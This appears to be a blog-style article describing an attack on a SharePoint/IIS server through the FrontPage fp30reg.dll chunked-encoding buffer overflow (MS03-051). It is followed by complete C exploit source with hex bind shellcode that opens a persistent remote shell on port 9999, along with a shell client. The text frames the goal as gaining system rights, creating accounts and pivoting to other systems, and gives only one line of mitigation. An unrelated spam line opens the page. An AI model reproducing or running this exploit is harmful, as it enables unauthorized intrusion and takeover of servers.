kamagra how much to take

Example SharePoint Hack Using Frontpage Extensions

Most Microsoft hackers will note that the default installation directories, as discussed in other articles, are the quickest way to get a hold of a SharePoint site. However, there is other interesting information that can be gathered from the host before you begin your attack, as well as helping facilitate the takeover, from using some pretty common IIS exploits. Firstly, lets attempt to execute a buffer overflow on our host, this will hopefully allow us to execute some arbitrary code on the server if everything goes according to plan. The ultimate goal in this case would be to trip a remote buffer overrun due to a flaw in frontpage server extensions, when we complete the overflow we should then have local system rights on the server, maybe we can even get a new account created so we can visit this server later and see if it can’t be a bridge for us to other systems.We are going to have to firstly chunked encoded request on our host, this should result in an output somewhat like:

————————————————————————
Event Type: Warning
Event Source: W3SVC
Event Category: None
Event ID: 2002
Description:
Out of process application ‘/LM/W3SVC/1/ROOT’ terminated unexpectedly.
————————————————————————

You should be able to find this in the eventlog following our attack on the SharePoint site. Our request will look something like POST /_vti_bin/_vti_aut/fp30reg.dl. A chunked encoded post will result in the control of ECX and EDI, with the exception occurring at a mov dword ptr [ECX+4],EDI instruction leading to remote command execution with privileges associated with the IWAM_machinename account.

We are just going to execute a little code in order to fully trip the overflow and see if we can’t get into the server (see code at bottom of this article).

If you want to eliminate this vunerability, just use the IIS lockdown tool to disable the extensions properly.

  1. ********************************************************************************/
  2.  
  3. #include <stdio.h>
  4. #include <string.h>
  5. #include <winsock.h>
  6. #pragma comment(lib,"ws2_32")
  7.  
  8. #define VER "0.1"
  9.  
  10. /******** bind shellcode spawns persistent shell on port 9999 *****************************/
  11. unsigned char kyrgyz_bind_code[] = {
  12. 0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
  13. 0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
  14. 0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88,
  15. 0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88,
  16. 0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE,
  17. 0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88,
  18. 0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88,
  19. 0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88,
  20. 0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88,
  21. 0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88,
  22. 0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88,
  23. 0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88,
  24. 0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88,
  25. 0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88,
  26. 0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89,
  27. 0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78,
  28. 0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77,
  29. 0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03,
  30. 0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05,
  31. 0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98,
  32. 0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC,
  33. 0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77,
  34. 0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03,
  35. 0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8,
  36. 0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C,
  37. 0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0,
  38. 0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03,
  39. 0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B,
  40. 0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03,
  41. 0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48,
  42. 0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
  43. };
  44.  
  45. void cmdshell (int sock);
  46. long gimmeip(char *hostname);
  47.  
  48. int main(int argc,char *argv[])
  49. {
  50. WSADATA wsaData;
  51. struct sockaddr_in targetTCP;
  52. struct hostent *host;
  53. int sockTCP,s;
  54. unsigned short port = 80;
  55. long ip;
  56. unsigned char header[]= "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1 ";
  57. unsigned char packet[3000],data[1500];
  58. unsigned char ecx[] = "xe0xf3xd4x67";
  59. unsigned char edi[] = "xffxd0x90x90";
  60. unsigned char call[] = "xe4xf3xd4x67";//overwrite .data section of fp30reg.dll
  61. unsigned char shortjmp[] = "xebx10";
  62.  
  63. printf(" -={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=- "
  64. " by Adik < netmaniac [at] hotmail.KG > ", VER);
  65. if(argc < 2)
  66. {
  67.  
  68. printf(" Usage: %s [Target] <port> "
  69. " eg: fp30reg.exe 192.168.63.130 ",argv[0]);
  70. return 1;
  71. }
  72. if(argc==3)
  73. port = atoi(argv[2]);
  74. WSAStartup(0x0202, &wsaData);
  75. printf("[*] Target: %s Port: %d ",argv[1],port);
  76. ip=gimmeip(argv[1]);
  77. memset(&targetTCP, 0, sizeof(targetTCP));
  78. memset(packet,0,sizeof(packet));
  79. targetTCP.sin_family = AF_INET;
  80. targetTCP.sin_addr.s_addr = ip;
  81. targetTCP.sin_port = htons(port);
  82. sprintf(packet,"%sHost: %s Transfer-Encoding: chunked ",header,argv[1]);
  83. memset(data, 0x90, sizeof(data)-1);
  84. data[sizeof(data)-1] = 'x0';
  85. memcpy(&data[16],edi,sizeof(edi)-1);
  86. memcpy(&data[20],ecx,sizeof(ecx)-1);
  87. memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);
  88. memcpy(&data[250+14],call,sizeof(call)-1);
  89. memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
  90. sprintf(packet,"%sContent-Length: %d %x %s 0 ",packet,
  91. strlen(data),strlen(data),data);
  92. if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
  93. {
  94. printf("[x] Socket not initialized! Exiting... ");
  95. WSACleanup();
  96. return 1;
  97. }
  98. printf("[*] Socket initialized... ");
  99. if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
  100. {
  101. printf("[*] Connection to host failed! Exiting... ");
  102. WSACleanup();
  103. exit(1);
  104. }
  105. printf("[*] Checking for presence of fp30reg.dll...");
  106. if (send(sockTCP, packet, strlen(packet),0) == -1)
  107. {
  108. printf("[x] Failed to inject packet! Exiting... ");
  109. WSACleanup();
  110. return 1;
  111. }
  112. memset(packet,0,sizeof(packet));
  113. if (recv(sockTCP, packet, sizeof(packet),0) == -1)
  114. {
  115. printf("[x] Failed to receive packet! Exiting... ");
  116. WSACleanup();
  117. return 1;
  118. }
  119. if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0')
  120. printf(" Found! ");
  121. else
  122. {
  123. printf(" Not Found!! Exiting... ");
  124. WSACleanup();
  125. return 1;
  126. }
  127. printf("[*] Packet injected! ");
  128. closesocket(sockTCP);
  129. printf("[*] Sleeping ");
  130. for(s=0;s<13000;s+=1000)
  131. {
  132. printf(". ");
  133. Sleep(1000);
  134. }
  135. printf(" [*] Connecting to host: %s on port 9999",argv[1]);
  136. if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
  137. {
  138. printf(" [x] Socket not initialized! Exiting... ");
  139. WSACleanup();
  140. return 1;
  141. }
  142. targetTCP.sin_family = AF_INET;
  143. targetTCP.sin_addr.s_addr = ip;
  144. targetTCP.sin_port = htons(9999);
  145. if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
  146. {
  147. printf(" [x] Exploit failed or there is a Firewall! Exiting... ");
  148. WSACleanup();
  149. exit(1);
  150. }
  151. printf(" [*] Dropping to shell... ");
  152. cmdshell(sockTCP);
  153. return 0;
  154. }
  155. /*********************************************************************************/
  156. void cmdshell (int sock)
  157. {
  158. struct timeval tv;
  159. int length;
  160. unsigned long o[2];
  161. char buffer[1000];
  162.  
  163. tv.tv_sec = 1;
  164. tv.tv_usec = 0;
  165.  
  166. while (1)
  167. {
  168. o[0] = 1;
  169. o[1] = sock;
  170.  
  171. length = select (0, (fd_set *)&o, NULL, NULL, &tv);
  172. if(length == 1)
  173. {
  174. length = recv (sock, buffer, sizeof (buffer), 0);
  175. if (length <= 0)
  176. {
  177. printf ("[x] Connection closed. ");
  178. WSACleanup();
  179. return;
  180. }
  181. length = write (1, buffer, length);
  182. if (length <= 0)
  183. {
  184. printf ("[x] Connection closed. ");
  185. WSACleanup();
  186. return;
  187. }
  188. }
  189. else
  190. {
  191. length = read (0, buffer, sizeof (buffer));
  192. if (length <= 0)
  193. {
  194. printf("[x] Connection closed. ");
  195. WSACleanup();
  196. return;
  197. }
  198. length = send(sock, buffer, length, 0);
  199. if (length <= 0)
  200. {
  201. printf("[x] Connection closed. ");
  202. WSACleanup();
  203. return;
  204. }
  205. }
  206. }
  207.  
  208. }
  209. /*********************************************************************************/
  210. long gimmeip(char *hostname)
  211. {
  212. struct hostent *he;
  213. long ipaddr;
  214.  
  215. if ((ipaddr = inet_addr(hostname)) < 0)
  216. {
  217. if ((he = gethostbyname(hostname)) == NULL)
  218. {
  219. printf("[x] Failed to resolve host: %s! Exiting... ",hostname);
  220. WSACleanup();
  221. exit(1);
  222. }
  223. memcpy(&ipaddr, he->h_addr, he->h_length);
  224. }
  225. return ipaddr;
  226. }
  227. /*********************************************************************************/
Share

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>